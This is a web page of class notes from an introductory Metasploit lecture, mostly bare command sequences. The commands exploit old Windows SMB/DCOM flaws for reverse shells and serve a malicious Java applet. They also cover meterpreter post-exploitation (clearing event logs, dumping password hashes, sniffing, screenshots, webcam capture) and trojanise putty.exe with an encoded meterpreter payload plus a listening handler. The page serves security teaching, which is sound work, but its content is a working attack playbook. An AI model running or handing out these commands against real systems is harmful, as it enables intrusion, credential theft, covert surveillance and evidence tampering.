Feel free to include my content in your page via my
RSS feed
Follow @irongeek_adc
Help Irongeek.com pay for
bandwidth and research equipment:
Search Irongeek.com:
Help Irongeek.com pay for bandwidth and research equipment:
This is a class we did to introduce students to Metasploit at IU Southeast.
Special guest lecturer Jeremy Druin (@webpwnize).
To follow along, I recommend downloading Kali Linux. Bing thanks to
http://www.offensive-security.com/
and please donate to
http://www.hackersforcharity.org/ Notes:
Metasploit Notes 1
Show directory structure
cd /opt/metasploit/apps/pro/msf3
ls
cd modules
<tab it out>
cd /opt/metasploit/apps/pro/msf3
Updates
msfupdate
apt-get update;apt-get
dist-upgrade
msfcli
msfcli exploits/windows/dcerpc/ms03_026_dcom
O
msfcli exploits/windows/dcerpc/ms03_026_dcom
P
msfcli exploits/windows/dcerpc/ms03_026_dcom
rhost=TARGET-IP lhost=METASPLOIT-IP
payload=windows/shell_reverse_tcp E
msfcli exploits/windows/dcerpc/ms03_026_dcom
rhost= TARGET-IP E
msfconsole
service postgresql start
service metasploit start
update-rc.d postgresql
enable
update-rc.d metasploit
enable
help
?
ping irongeek.com
search ms08
use
exploit/windows/smb/ms08_067_netapi
back
info
exploit/windows/smb/ms08_067_netapi
use
exploit/windows/smb/ms08_067_netapi
show options
set rhost
TARGET-IP
exploit
run
active vs passive
use
exploit/multi/browser/java_signed_applet
set lport 3456
set SRVPORT 3245
set lhost
METASPLOIT-IP
set APPLETNAME
"Adrians_funapp"
set CERTCN irongeek.com
set ENCODER
x86/shikata_ga_nai
set payload
windows/meterpreter/reverse_tcp
set uripath /
run
jobs
kill 0
Social Engineering
Toolkit Way
setoolkit
1 2 1 2
no
METASPLOIT-IP
irongeek.com
2 3
445
Meterpreter
ls
sysinfo
shell
exit
help
help core
background
sessions -l
session -i 1
cd
pwd
cat
clearev #Clear logs
getsystem
ps
migrate 608
getuid
hashdump
load -l
load sniffer
sniffer_interfaces
sniffer_start 1
sniffer_stats 1
sniffer_dump 1
/root/my.pcap
sniffer_stop 1
screenshot
resource somefile
run vnc
Using a Scanner
msfconsole
db_status
workspace
hosts
use
auxiliary/scanner/smb/smb_version
set rhosts
TARGET-IP/24
set threads 100
run
hosts
Trojans
/etc/init.d/apache2 start
cd /var/www
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfpayload windows/meterpreter/reverse_tcp
LHOST= METASPLOIT-IP LPORT=443 R | msfencode
-e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -k -o /var/www/puttyx.exe
Or
msfvenom -p windows/meterpreter/reverse_tcp
LHOST= METASPLOIT-IP LPORT=443 -x /var/www/putty.exe
-e x86/shikata_ga_nai -i 15 -k -f exe >some.exe
(in msfconsole)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
METASPLOIT-IP
set LPORT 443
exploit
(run the exe, and show
some other things)
webcam_list
webcam_snap 1
run webcam
Armitage as Metasploit
GUI
service postgresql start
service metasploit start
armitage
(Based on
http://www.offensive-security.com/metasploit-unleashed )
http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
15 most recent posts on Irongeek.com:
If you would like to republish one of the articles from this site on your
webpage or print journal please contact IronGeek.
Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast